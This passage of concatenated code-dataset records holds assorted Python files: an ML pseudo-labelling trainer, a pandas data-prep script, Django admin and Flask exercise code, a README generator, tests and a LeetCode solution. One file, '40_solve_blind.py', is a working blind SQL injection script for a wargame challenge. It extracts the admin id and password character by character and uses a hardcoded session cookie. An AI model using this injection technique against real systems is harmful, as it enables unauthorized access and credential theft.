engine.state.pseudo_labelled_dataset = RelabelDataset(\n confident_points, pseudo_labels\n )\n else:\n engine.state.pseudo_labelled_dataset = PseudoLabelDataset(\n confident_points, pseudo_labels\n )\n else:\n engine.state.pseudo_labelled_dataset = None\n\n @staticmethod\n def _initialise(engine: Engine):\n engine.state.pseudo_labelled_dataset = None\n\n\nclass PseudoLabelCollector:\n def __init__(\n self,\n threshold: float,\n log_dir: Optional[str] = None,\n pred_transform: Callable[[torch.Tensor], torch.Tensor] = lambda x: x.exp(),\n ):\n self._indices = []\n self._plabs = []\n self._pred_transform = pred_transform\n self._output_transform = lambda x: x\n self._thresh = threshold\n self._targets = []\n self._preds = []\n if log_dir:\n self._saver = PLPredictionSaver(log_dir, pred_transform=pred_transform)\n else:\n 
self._saver = None\n self._batch_size = None\n\n def _parse(self, engine: Engine):\n preds, targets = self._output_transform(engine.state.output)\n # state.iteration starts with 1\n iteration = engine.state.iteration - 1\n offset = iteration * self._batch_size\n with torch.no_grad():\n preds = self._pred_transform(preds)\n preds_max, plabs = torch.max(preds, dim=-1)\n mask = torch.nonzero(preds_max >= self._thresh).flatten()\n if mask.shape[0]:\n # plabs = [N,]\n self._plabs.append(plabs[mask])\n self._indices.append(mask + offset)\n\n def _flush(self, engine: Engine):\n if self._indices and self._plabs:\n engine.state.pl_indices = torch.cat(self._indices)\n engine.state.pl_plabs = torch.cat(self._plabs)\n else:\n engine.state.pl_indices = torch.Tensor([])\n engine.state.pl_plabs = torch.Tensor([])\n self._indices = []\n self._plabs = []\n\n def attach(self, engine: Engine, batch_size: int, output_transform=lambda x: x):\n r\"\"\"\n\n Args:\n engine (Engine): ignite engine object\n batch_size (int): engine's batch size\n output_transform (Callable): if engine.state.output is not (preds, target),\n then output_transform should return aforementioned tuple.\n\n Returns:\n NoneType: None\n \"\"\"\n engine.add_event_handler(Events.ITERATION_COMPLETED, self._parse)\n engine.add_event_handler(Events.COMPLETED, self._flush)\n self._output_transform = output_transform\n self._batch_size = batch_size\n if self._saver:\n self._saver.attach(engine, output_transform=output_transform)\n\n def global_step_from_engine(self, engine: Engine):\n if self._saver:\n self._saver.global_step_from_engine(engine)\n\n\ndef _update_dataloader(\n loader: torchdata.DataLoader,\n dataset: torchdata.Dataset,\n sampler: Optional[torchdata.Sampler] = None,\n):\n # attributes that usually go in dataloader's constructor\n attrs = [k for k in loader.__dict__.keys() if not k.startswith(\"_\")]\n drop = [\"dataset\", \"sampler\", \"batch_sampler\", \"dataset_kind\"]\n kwargs = {k: getattr(loader, k) for k in attrs if k not in drop}\n if not isinstance(\n loader.sampler,\n (\n torchdata.SequentialSampler,\n torchdata.RandomSampler,\n RandomFixedLengthSampler,\n ),\n ):\n raise ValueError(\n f\"Only sequential, random, and random fixed length samplers \"\n f\"are supported in _update_dataloader\"\n )\n kwargs[\"dataset\"] = dataset\n # Sequential and Random will be automatically determined if sampler is None (depending on shuffle)\n kwargs[\"sampler\"] = sampler\n return torchdata.DataLoader(**kwargs)\n\n\ndef create_pseudo_label_trainer(\n model: ALRModel,\n loss: _Loss_fn,\n optimiser: str,\n train_loader: torchdata.DataLoader,\n val_loader: torchdata.DataLoader,\n pseudo_label_manager: PseudoLabelManager,\n rfls_len: Optional[int] = None,\n patience: Optional[int] = None,\n reload_best: Optional[bool] = None,\n epochs: Optional[int] = 1,\n device: _DeviceType = None,\n *args,\n **kwargs,\n):\n def _step(engine: Engine, _):\n # update loader accordingly: if pld is not none, concatenate them\n new_loader = train_loader\n pld = engine.state.pseudo_labelled_dataset\n if pld is not None:\n # only reset weights if engine.state.epoch != 1\n model.reset_weights()\n train_ds = torchdata.ConcatDataset((train_loader.dataset, pld))\n # update dataloader's dataset attribute\n if rfls_len:\n new_loader = _update_dataloader(\n train_loader,\n train_ds,\n RandomFixedLengthSampler(train_ds, length=rfls_len, shuffle=True),\n )\n else:\n new_loader = _update_dataloader(train_loader, train_ds)\n else:\n assert engine.state.epoch == 1\n\n # begin 
supervised training\n trainer = Trainer(\n model,\n loss,\n optimiser,\n patience,\n reload_best,\n device=device,\n *args,\n **kwargs,\n )\n history = trainer.fit(\n new_loader,\n val_loader=val_loader,\n epochs=epochs,\n )\n\n # if early stopping was applied w/ patience, then the actual train acc and loss should be\n # -patience from the final loss/acc UNLESS we reached the maximum number of epochs.\n if patience and len(history[\"train_loss\"]) != epochs:\n return history[\"train_loss\"][-patience], history[\"train_acc\"][-patience]\n return history[\"train_loss\"][-1], history[\"train_acc\"][-1]\n\n e = Engine(_step)\n pseudo_label_manager.attach(e)\n return e\n\n\nclass EphemeralTrainer:\n def __init__(\n self,\n model: ALRModel,\n pool: UnlabelledDataset,\n loss: _Loss_fn,\n optimiser: str,\n threshold: float,\n random_fixed_length_sampler_length: Optional[int] = None,\n log_dir: Optional[str] = None,\n patience: Optional[int] = None,\n reload_best: Optional[bool] = False,\n device: _DeviceType = None,\n pool_loader_kwargs: Optional[dict] = {},\n *args,\n **kwargs,\n ):\n self._pool = pool\n self._model = model\n self._loss = loss\n self._optimiser = optimiser\n self._patience = patience\n self._reload_best = reload_best\n self._device = device\n self._args = args\n self._kwargs = kwargs\n self._threshold = threshold\n self._log_dir = log_dir\n self._pool_loader_kwargs = pool_loader_kwargs\n self._rfls_len = random_fixed_length_sampler_length\n\n def fit(\n self,\n train_loader: torchdata.DataLoader,\n val_loader: Optional[torchdata.DataLoader] = None,\n iterations: Optional[int] = 1,\n epochs: Optional[int] = 1,\n ):\n if self._patience and val_loader is None:\n raise ValueError(\n \"If patience is specified, then val_loader must be provided in .fit().\"\n )\n\n val_evaluator = create_supervised_evaluator(\n self._model,\n metrics={\"acc\": Accuracy(), \"loss\": Loss(self._loss)},\n device=self._device,\n )\n\n history = defaultdict(list)\n pbar = ProgressBar()\n\n def _log_metrics(engine: Engine):\n # train_loss and train_acc are moving averages of the last epoch\n # in the supervised training loop\n train_loss, train_acc = engine.state.output\n history[f\"train_loss\"].append(train_loss)\n history[f\"train_acc\"].append(train_acc)\n pbar.log_message(\n f\"Eph. iteration {engine.state.epoch}/{engine.state.max_epochs}\\n\"\n f\"\\ttrain acc = {train_acc}, train loss = {train_loss}\"\n )\n if val_loader is None:\n return # job done\n # val loader - save to history and print metrics. Also, add handlers to\n # evaluator (e.g. 
early stopping, model checkpointing that depend on val_acc)\n metrics = val_evaluator.run(val_loader).metrics\n\n history[f\"val_acc\"].append(metrics[\"acc\"])\n history[f\"val_loss\"].append(metrics[\"loss\"])\n pbar.log_message(\n f\"\\tval acc = {metrics['acc']}, val loss = {metrics['loss']}\"\n )\n\n pseudo_label_manager = PseudoLabelManager(\n pool=self._pool,\n model=self._model,\n threshold=self._threshold,\n log_dir=self._log_dir,\n device=self._device,\n **self._pool_loader_kwargs,\n )\n trainer = create_pseudo_label_trainer(\n model=self._model,\n loss=self._loss,\n optimiser=self._optimiser,\n train_loader=train_loader,\n val_loader=val_loader,\n pseudo_label_manager=pseudo_label_manager,\n rfls_len=self._rfls_len,\n patience=self._patience,\n reload_best=self._reload_best,\n epochs=epochs,\n device=self._device,\n *self._args,\n **self._kwargs,\n )\n # output of trainer are running averages of train_loss and train_acc (from the\n # last epoch of the supervised trainer)\n pbar.attach(trainer, output_transform=lambda x: {\"loss\": x[0], \"acc\": x[1]})\n if val_loader is not None and self._patience:\n es = EarlyStopper(\n self._model, self._patience, trainer, key=\"acc\", mode=\"max\"\n )\n es.attach(val_evaluator)\n trainer.add_event_handler(Events.EPOCH_COMPLETED, _log_metrics)\n trainer.run(\n range(iterations),\n max_epochs=iterations,\n epoch_length=1,\n )\n if val_loader is not None and self._patience and self._reload_best:\n es.reload_best()\n\n history[\"train_size\"] = np.array(pseudo_label_manager.acquired_sizes) + len(\n train_loader.dataset\n )\n return history\n\n def evaluate(self, data_loader: torchdata.DataLoader) -> dict:\n evaluator = create_supervised_evaluator(\n self._model,\n metrics={\"acc\": Accuracy(), \"loss\": Loss(self._loss)},\n device=self._device,\n )\n return evaluator.run(data_loader).metrics\n\n\ndef main(threshold: float, b: int):\n manual_seed(42)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n kwargs = dict(num_workers=4, pin_memory=True)\n\n BATCH_SIZE = 64\n REPS = 6\n ITERS = 24\n VAL_SIZE = 5_000\n MIN_TRAIN_LEN = 12_500\n SSL_ITERATIONS = 200\n EPOCHS = 200\n\n accs = defaultdict(list)\n\n template = f\"thresh_{threshold}_b_{b}\"\n calib_metrics = Path(\"calib_metrics\") / template\n saved_models = Path(\"saved_models\") / template\n metrics = Path(\"metrics\") / template\n calib_metrics.mkdir(parents=True)\n saved_models.mkdir(parents=True)\n metrics.mkdir(parents=True)\n\n train, pool, test = Dataset.MNIST.get_fixed()\n val, pool = torchdata.random_split(pool, (VAL_SIZE, len(pool) - VAL_SIZE))\n pool = UnlabelledDataset(pool)\n test_loader = torchdata.DataLoader(test, batch_size=512, shuffle=False, **kwargs)\n val_loader = torchdata.DataLoader(val, batch_size=512, shuffle=False, **kwargs)\n\n for r in range(1, REPS + 1):\n model = MCDropout(Dataset.MNIST.model, forward=20, fast=True).to(device)\n bald = BALD(eval_fwd_exp(model), device=device, batch_size=512, **kwargs)\n dm = DataManager(train, pool, bald)\n dm.reset() # to reset pool\n print(f\"=== repeat #{r} of {REPS} ===\")\n for i in range(1, ITERS + 1):\n # don't reset weights: let ephemeral trainer take care of it\n # since we're collecting calibration metrics,\n # make pool return targets too. (i.e. 
debug mode)\n            with dm.unlabelled.tmp_debug():\n                trainer = EphemeralTrainer(\n                    model,\n                    dm.unlabelled,\n                    F.nll_loss,\n                    \"Adam\",\n                    threshold=threshold,\n                    random_fixed_length_sampler_length=MIN_TRAIN_LEN,\n                    log_dir=(calib_metrics / f\"rep_{r}\" / f\"iter_{i}\"),\n                    patience=3,\n                    reload_best=True,\n                    device=device,\n                    pool_loader_kwargs=kwargs,\n                )\n                train_loader = torchdata.DataLoader(\n                    dm.labelled,\n                    batch_size=BATCH_SIZE,\n                    sampler=RandomFixedLengthSampler(\n                        dm.labelled, MIN_TRAIN_LEN, shuffle=True\n                    ),\n                    **kwargs,\n                )\n                with timeop() as t:\n                    history = trainer.fit(\n                        train_loader,\n                        val_loader,\n                        iterations=SSL_ITERATIONS,\n                        epochs=EPOCHS,\n                    )\n            # eval on test set\n            test_metrics = trainer.evaluate(test_loader)\n            accs[dm.n_labelled].append(test_metrics[\"acc\"])\n            print(f\"-- Iteration {i} of {ITERS} --\")\n            print(\n                f\"\\ttrain: {dm.n_labelled}; pool: {dm.n_unlabelled}\\n\"\n                f\"\\t[test] acc: {test_metrics['acc']}; time: {t}\"\n            )\n\n            # save stuff\n            with open(metrics / f\"rep_{r}_iter_{i}.pkl\", \"wb\") as fp:\n                payload = {\n                    \"history\": history,\n                    \"test_metrics\": test_metrics,\n                    \"labelled_classes\": dm.unlabelled.labelled_classes,\n                    \"labelled_indices\": dm.unlabelled.labelled_indices,\n                }\n                pickle.dump(payload, fp)\n            torch.save(model.state_dict(), saved_models / f\"rep_{r}_iter_{i}.pth\")\n\n            # finally, acquire points\n            dm.acquire(b)\n\n    with open(f\"{template}_accs.pkl\", \"wb\") as fp:\n        pickle.dump(accs, fp)\n\n\nif __name__ == \"__main__\":\n    main(threshold=0.95, b=10)\n","sub_path":"docs/source/experiments/old/ephemeral/mnist/legacy/dont_reset_weights_more_iters/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242970747","text":"import numpy as np\nimport pandas as pd\n\ndf = pd.read_csv('../../data/spx2014to2017.csv', index_col = 'date', parse_dates = True)\ndf.drop(df.index[0], inplace = True)\n# df.count() # this could help\ndf.dropna(inplace=True, axis = 1)\n\n# risk free rate\nrisk_free = df[\"USGG10YR Index\"] / 100\n\n# forward looking YoY returns\nspx = df[\"SPX INDEX\"]\nyoy = spx.pct_change(250).shift(-250)\nyoy.dropna(inplace = True)\n\n# Forward looking annual returns for all index members\nann_returns = df.pct_change(250).shift(-250)\nann_returns.dropna(inplace = True, axis = 0, how = 'all')\nann_returns.drop(\"USGG10YR Index\", inplace=True, axis = 1)\n\n\n# subtract risk free returns as quoted on the day from forward annual stock returns to get excess annual returns\nexcess_returns = ann_returns.subtract(risk_free, axis = 0)\nexcess_returns.drop('SPX INDEX', axis = 1, inplace=True)\nexcess_returns.dropna(inplace=True, how='all')\n\n\n# Save the result so it doesn't have to be recomputed\n#excess_returns.to_csv('../data/excess_returns.csv')\n\n# Get the Factor data and set categories as large and small market cap - I just took the most recent market cap, but I think historical market cap (based on the first day of forward looking returns) should be used. 
I'm not sure if using an updating market cap would be beneficial since it's based on the price.\n# using the Fama-French factor data\nfactor_returns = pd.read_csv('../../data/factors.csv', parse_dates=True, index_col = 'date')\n\n\n# this might be wrong because these are daily returns - not annual returns\n# you want the annual geometric average of factor returns lagged by one year\nnew_data = excess_returns.merge(factor_returns, left_index=True, right_index=True)","sub_path":"chap3/fm/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443150896","text":"from django.contrib import admin\n#from django.db import models as django_models\n#from django.forms.extras.widgets import SelectDateWidget\nfrom gigs.gig_registry import models\n\n\nclass VenueAdmin(admin.ModelAdmin):\n    prepopulated_fields = {'uid':('name',)}\n\nclass MusicianInline(admin.TabularInline):\n    fields = ['musician', 'started', 'finished', 'date_of_birth', 'instrument',]\n    model = models.Musician\n\n#class MusicianAdmin(admin.ModelAdmin):\n#    inlines = [MembershipInline]\n\nclass MembershipAdmin(admin.ModelAdmin):\n    pass  # inlines = [MusicianInline]\n\nclass MembershipInline(admin.TabularInline):\n    model = models.BandMembership\n    verbose_name = \"Band Member\"\n    verbose_name_plural = \"Band Members\"\n    fields = ['musician', 'started', 'finished']\n\n    extra = 3\n\nclass BandAdmin(admin.ModelAdmin):\n    inlines = [MembershipInline]\n\nclass BandInline(admin.TabularInline):\n    model = models.Gig.bands.through\n\n\nclass GigAdmin(admin.ModelAdmin):\n    fieldsets = [\n        (None, {'fields': ['name', 'venue','bands', 'cost']}),\n        ('Dates', {'fields': ['start', 'finish']}),\n        ('Meta', {'fields': ['comment']}),\n    ]\n    \n    filter_horizontal = ('bands',)\n    list_filter = ('venue', 'bands',)\n\n# NOTE: this redefinition shadows the VenueAdmin declared above; it is the one registered below.\nclass VenueAdmin(admin.ModelAdmin):\n    list_display = ['name', 'location']\n\nclass LocationAdmin(admin.ModelAdmin):\n    #fields = ['street_address', 'suburb', 'state', 'post_code', 'country', 'lat', 'lon']\n    fieldsets = [\n        ('Address', \n            {'fields': \n                [\n                    'street_address', \n                    'suburb', \n                    'state', \n                    'post_code', \n                    'country', \n                ]\n            }\n        ),\n        ('Co-ordinates',\n            {'fields':\n                [\n                    'lat',\n                    'lon',\n                ]\n            }\n        )\n    ]\n\nadmin.site.register(models.Band, BandAdmin)\nadmin.site.register(models.Musician)\nadmin.site.register(models.Owner)\nadmin.site.register(models.Venue, VenueAdmin)\nadmin.site.register(models.Location, LocationAdmin)\nadmin.site.register(models.Genre)\nadmin.site.register(models.Gig, GigAdmin)\nadmin.site.register(models.BandMembership, MembershipAdmin)\n","sub_path":"gigs/gig_registry/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228127828","text":"from flask import Flask, request, redirect, render_template\nimport cgi\n\napp = Flask(__name__)\napp.config['DEBUG'] = True      # Displays runtime errors in the browser, too.\n\n# A list of movies that nobody should have to watch.\nterrible_movies = [\n    \"Gigli\",\n    \"Star Wars Episode 1: Attack of the Clones\",\n    \"Paul Blart: Mall Cop 2\",\n    \"Nine Lives\",\n    \"Mission to Mars\"\n]\n\ndef get_current_watchlist():\n    # Returns user's current watchlist -- hard coded for now\n    return [\"Heartbreakers\", \"She-Devil\", \"Jackie Brown\", \"Heathers\", \"Death Becomes Her\"]\n\n# TODO ---\n# Modify \"My Watchlist\" so you eliminate the need for the 
\"crossoff\" form in\n# edit.html. Now, next to every list item/movie listed in \"My Watchlist\" you\n# should display a button that says \"I Watched It!\".\n# Clicking the button will result in a confirmation message that the movie has\n# been watched. So, you'll need to add a form within the <li> tags of \"My\n# Watchlist\". Once this is done, delete the \"crossoff\" form in edit.html\n\n# TODO ---\n# Make a ratings.html template which lists all movies that have been crossed off.\n# It should have a header of <h2>Movies I Have Watched</h2>\n# Add a form for rating EACH list item/movie using a <select> dropdown with\n# the options/values in this list: [\"How was it?\", \"*\", \"**\", \"***\", \"****\", \n# \"*****\"] And with a button that says \"Rate It!\" to submit the user's rating.\n# Give this form the action of \"/rating-confirmation\" and the method of post.\n\n# TODO ---\n# Add a function, movie_ratings, to handle a get request and render the template\n# at \"/ratings\"\n@app.route(\"/ratings\", methods=['GET'])\ndef ratings():\n    return render_template(\"ratings.html\", watchedlist = get_watched_movies())\n\n# TODO ---\n# Add a function, get_watched_movies, to get the list of crossed off movies. For\n# now, create a hard-coded list with a few movie titles.\ndef get_watched_movies():\n    return [\"But I'm a Cheerleader\", \"Saved!\", \"Visitor Q\", \"Onmyoji\", \"Best in Show\"]\n\n# TODO ---\n# Make a rating-confirmation.html template, to be displayed when the user rates\n# a movie they have crossed off.\n\n# TODO ---\n# Create a rate_movie function that handles a post request on \n# /rating-confirmation and renders the 'rating-confirmation' template.\n@app.route(\"/rating-confirmation\", methods=['POST'])\ndef rating_confirmation():\n    movie = request.form['rated-movie']\n    rating = request.form['rating']\n    return render_template(\"rating-confirmation.html\", movie = movie, rating = rating)\n\n@app.route(\"/crossoff\", methods=['POST'])\ndef crossoff_movie():\n    crossed_off_movie = request.form['crossed-off-movie']\n\n    if crossed_off_movie not in get_current_watchlist():\n        # The user tried to cross off a movie that isn't in their list.\n        # so we redirect back to the front page and tell them what went wrong.\n        error = \"'{0}' is not in your watchlist, so you can't cross it off!\".format(crossed_off_movie)\n\n        # Redirect to homepage, and include error as a query parameter in the URL\n        return redirect(\"/?error=\" + error)\n\n    # If we didn't redirect by now, then all is well.\n    return render_template('crossoff.html', crossed_off_movie = crossed_off_movie)\n\n@app.route(\"/add\", methods=['POST'])\ndef add_movie():\n    # Look inside the request to figure out what the user typed.\n    new_movie = request.form['new-movie']\n\n    # If the user typed nothing at all, redirect and tell them the error.\n    if (not new_movie) or (new_movie.strip() == \"\"):\n        error = \"Please specify the movie you want to add.\"\n        return redirect(\"/?error=\" + error)\n\n    # If the user wants to add a terrible movie, redirect and tell them the error\n    if new_movie in terrible_movies:\n        error = \"Trust me, you don't want to add '{0}' to your watchlist.\".format(new_movie)\n        return redirect(\"/?error=\" + error)\n\n    # 'Escape' the user's input so that if they typed HTML, it doesn't mess up our site\n    new_movie_escaped = cgi.escape(new_movie, quote = True)\n\n    return render_template('add-confirmation.html', movie = new_movie_escaped)\n\n@app.route(\"/\")\ndef index():\n    encoded_error = request.args.get(\"error\")\n    return 
render_template('edit.html', watchlist = get_current_watchlist(), error = encoded_error and cgi.escape(encoded_error, quote = True))\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"472143313","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport shutil\nimport collections\nimport urllib.parse\n\n\nclass InvalidFileFormatException(Exception):\n pass\n\n\nWordEntry = collections.namedtuple(\"WordEntry\", \"word definition examples file_addr\")\n\n\ndef load_words():\n words = []\n\n russian_text_pattern = r\"\"\"([\\.\\,\\-\\_\\'\\\"\\@\\?\\!\\:\\;\\w\\/\\\\ ]+)\"\"\"\n\n word_pattern = russian_text_pattern\n definition_pattern = russian_text_pattern\n example_pattern = russian_text_pattern\n\n definition_pattern = re.compile(definition_pattern, re.VERBOSE)\n\n dir = 'words'\n for basename in os.listdir(dir):\n filename = os.path.join(dir, basename)\n if not os.path.isfile(filename):\n print('Skipping non-file \"%s\"' % filename)\n continue\n\n with open(filename) as inp:\n word_line = inp.readline().strip()\n\n word_match = re.match(word_pattern, word_line)\n if not word_match:\n raise InvalidFileFormatException()\n word = word_match.group(1)\n\n # skip separator line\n inp.readline()\n\n definition_line = inp.readline().strip()\n\n definition_match = re.match(definition_pattern, definition_line)\n if not definition_match:\n raise InvalidFileFormatException()\n definition = definition_match.group(1)\n\n # skip separator line\n inp.readline()\n\n examples = []\n for example_line in inp:\n example_match = re.match(example_pattern, example_line)\n if not example_match:\n raise InvalidFileFormatException\n\n examples.append(example_match.group(1))\n\n file_addr = \"https://github.com/Azatik1000/russian-it-dict/blob/master/\" \\\n + urllib.parse.quote(filename)\n\n words.append(WordEntry(word=word, definition=definition, examples=examples, file_addr=file_addr))\n\n words.sort(key=lambda wordEntry: wordEntry.word)\n return words\n\n\ndef write_words(wordEntries, outp):\n for wordEntry in wordEntries:\n examples_str = \"\"\n for i, example in enumerate(wordEntry.examples):\n examples_str += f\"{i + 1}. 
{example} \"\n\n outp.write(f'| {wordEntry.word} | {wordEntry.definition} | {examples_str} | [Тык]({wordEntry.file_addr}) |\\n')\n\n\ndef update_readme(words):\n shutil.copyfile(\"readme_header.md\", \"README.md\")\n\n with open('README.md', 'a', encoding='UTF-8') as outp:\n write_words(words, outp)\n\n\ndef main():\n words = load_words()\n update_readme(words)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"update_readme.py","file_name":"update_readme.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"272379725","text":"import sys\nimport requests\nimport time\n\n\nurl = \"http://webhacking.kr/challenge/web/web-29/index.php\"\ncookies = {'PHPSESSID':'9d83454b9b99c52d5941f936dfcf1445'}\npayload = {'no':'', 'id':'guest', 'pw':'guest'}\n\n\ndef brute_initial(col):\n sql = \"9||conv(hex(substr({column},{pos},1)),16,10){opr}{val}\"\n print(\"[-brute_initial-] \" + sql.format(column=col, pos='i', val='val', opr='='))\n initials = []\n for i in range(256):\n payload['no'] = sql.format(column=col, pos=1, val=i, opr='=')\n print(payload['no'])\n r = requests.get(url, cookies=cookies, params=payload)\n if r.text.find('Failure') == -1:\n print(\" ***** HIT first char : \" + chr(i))\n initials.append(chr(i))\n \n return initials\n \n\n\ndef bin_search(col):\n sql = \"9||no=2&&conv(hex(substr({column},{pos},1)),16,10){opr}{val}\"\n print(\"[-binary_search-] \" + sql.format(column=col, pos='i', val='val', opr='>'))\n answer = ''\n for i in range(1, 36):\n low = 0\n high = 255\n while high >= low:\n mid = low + ((high - low) // 2)\n payload['no'] = sql.format(column=col, pos=i, val=mid, opr='>')\n print(\"[*] \" + payload['no'])\n r = requests.get(url, cookies=cookies, params=payload)\n if r.text.find('admin') != -1:\n low = mid\n elif r.text.find('Failure') != -1:\n high = mid\n else:\n print(\"!!!!!!! 
neither T/F !!!!!!!\\n\")\n print(r.text)\n break\n \n if high == low+1:\n answer += chr(high)\n print(answer)\n break\n \n if high == 1:\n break\n\n return answer\n\n\n\nif __name__ == \"__main__\":\n # no = brute_initial('no')\n id_ = bin_search('id')\n pw = bin_search('pw')\n # print(\"id : {}\\npw : {}\\n\".format(id_, pw))\n \n \n ","sub_path":"hack/kr/40_solve_blind.py","file_name":"40_solve_blind.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488184922","text":"#!/usr/bin/python\n\n# import avango-guacamole\nimport avango\nimport avango.gua\nimport avango.script\nimport EdgeContainer\n\n# import python libraries\nimport math\n\n## GUILayer\n#\n# This class creates menus and \nclass Edge:\n\n def __init__(self, NAME, PARENT_NODE, START, END, THICKNESS, edge_functionality = None):\n self.PARENT_NODE = PARENT_NODE\n self.active = False\n self.highlight = False\n\n self.material = avango.gua.nodes.Material()\n self.material.set_uniform(\"Color\", avango.gua.Vec4(0.3,0.3,0.50, 1.0))\n\n self.highlight_material = avango.gua.nodes.Material()\n self.highlight_material.set_uniform(\"Color\", avango.gua.Vec4(0.9,0.1,0.1, 1.0))\n\n self.NAME = NAME\n self.START = START\n self.END = END\n self.THICKNESS = THICKNESS\n self.edge_functionality = None\n\n if edge_functionality != None:\n self.edge_functionality = edge_functionality\n\n self.id = EdgeContainer.edge_count\n EdgeContainer.edges.append(self)\n EdgeContainer.edge_count += 1\n \n\n _loader = avango.gua.nodes.TriMeshLoader()\n self.geometry = _loader.create_geometry_from_file(self.NAME, \"data/objects/cube.obj\",\n self.material, avango.gua.LoaderFlags.DEFAULTS | avango.gua.LoaderFlags.MAKE_PICKABLE) \n\n self.set_transform(START, END, THICKNESS)\n\n def execute(self, CROSSING_POINT):\n if self.active:\n if (self.edge_functionality != None):\n self.edge_functionality.execute(CROSSING_POINT)\n else:\n self.toggle_highlight()\n print(self.NAME,\" has no functionality\")\n\n def add_functionality(self, edge_functionality):\n self.edge_functionality = edge_functionality\n\n def get_start(self):\n _pos = self.PARENT_NODE.WorldTransform.value * avango.gua.make_trans_mat(self.start)\n return _pos.get_translate()\n\n def get_end(self):\n #_pos = self.geometry.Parent.value.WorldTransform.value.get_translate()\n #return _pos + self.end\n #return self.geometry.WorldTransform.value.get_translate() + self.end\n _pos = self.PARENT_NODE.WorldTransform.value * avango.gua.make_trans_mat(self.end)\n return _pos.get_translate()\n\n def set_material(self,R,G,B):\n _rgb = avango.gua.Vec3(R,G,B)\n _rgb.normalize()\n _color = avango.gua.Vec4(_rgb.x,_rgb.y,_rgb.z,1.0)\n\n self.material.set_uniform(\"Color\", _color)\n #self.material.set_uniform(\"Roughness\", random.random())\n #self.material.set_uniform(\"Metalness\", random.random())\n\n def toggle_activity(self):\n self.active = not self.active\n if self.geometry.Parent.value == None:\n self.active = False\n\n def set_activity(self,STATE):\n self.active = STATE\n if self.geometry.Parent.value == None:\n self.active = False\n\n def toggle_highlight(self):\n self.highlight = not self.highlight\n if self.highlight == True: # enable highlight\n self.geometry.Material.value = self.highlight_material\n else: # disable\n self.geometry.Material.value = self.material\n\n def set_highlight(self,FLAG):\n if FLAG == True: # enable highlight\n self.geometry.Material.value = self.highlight_material\n else: # disable\n 
self.geometry.Material.value = self.material\n self.highlight = FLAG\n\n def set_transform(self, START, END, thickness = None):\n self.start = START \n self.end = END \n if(thickness != None):\n self.THICKNESS = thickness\n \n _vec1 = avango.gua.Vec3(0.0,1.0,0.0)\n _vec2 = START - END\n\n _distance = _vec2.length()\n \n _vec1.normalize()\n _vec2.normalize()\n\n _axis = _vec1.cross(_vec2)\n _angle = math.degrees(math.acos(round(_vec1.dot( _vec2), 6)))\n\n _object_rotation_mat = avango.gua.make_rot_mat(_angle, _axis) \n _object_pos = (START + END) * 0.5 \n\n _mat = avango.gua.make_trans_mat(_object_pos) * _object_rotation_mat *\\\n avango.gua.make_scale_mat(self.THICKNESS, _distance, self.THICKNESS) #*\\\n #avango.gua.make_inverse_mat(avango.gua.make_scale_mat(self.PARENT_NODE.WorldTransform.value.get_scale()))\n self.geometry.Transform.value = _mat","sub_path":"Edge.py","file_name":"Edge.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"202942042","text":"import os\nimport sys\nimport unittest\n\nimport requests_mock\n\nfrom ... import reset_tweak_changes\n\npkg_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')) # noqa\nsys.path.insert(0, pkg_root) # noqa\n\nfrom hca import upload\nfrom .. import mock_current_upload_area, mock_upload_area\n\n\nclass TestUploadListArea(unittest.TestCase):\n\n @reset_tweak_changes\n def test_list_current_area(self):\n area = mock_current_upload_area()\n\n with requests_mock.mock() as m:\n mock_url = 'https://upload.test.data.humancellatlas.org/v1/area/{uuid}'.format(uuid=area.uuid)\n m.get(mock_url, text='{\"files\":[{\"some\":\"data\"}]}')\n\n file_list = upload.list_current_area()\n\n self.assertEqual(file_list, [{'some': 'data'}])\n\n @reset_tweak_changes\n def test_list_area(self):\n area1 = mock_upload_area()\n area2 = mock_upload_area()\n\n with requests_mock.mock() as m:\n area1_mock_url = 'https://upload.test.data.humancellatlas.org/v1/area/{uuid}'.format(uuid=area1.uuid)\n area2_mock_url = 'https://upload.test.data.humancellatlas.org/v1/area/{uuid}'.format(uuid=area2.uuid)\n m.get(area1_mock_url, text='{\"files\":[{\"area1\":\"file\"}]}')\n m.get(area2_mock_url, text='{\"files\":[{\"area2\":\"file\"}]}')\n\n file_list = upload.list_area(area1.uuid)\n\n self.assertEqual(file_list, [{'area1': 'file'}])\n","sub_path":"test/upload/python_bindings/test_list_area.py","file_name":"test_list_area.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166725212","text":"class Solution:\n def minFallingPathSum(self, A: 'List[List[int]]') -> 'int':\n n = len(A)\n dp = [A[-1]]\n for i in range(1, n):\n dp_row = []\n for j in range(n):\n choice = dp[i-1][j-1 if j>0 else 0:j+2 if j<n-1 else n]\n dp_row.append(A[n-i-1][j] + min(choice))\n dp.append(dp_row)\n return min(dp[-1])\n\n\nS = Solution()\nprint(\n S.minFallingPathSum(\n [[1,2,3],\n [4,5,6],\n [9,8,7]]\n )\n)","sub_path":"py3/Prob9/Prob931.py","file_name":"Prob931.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 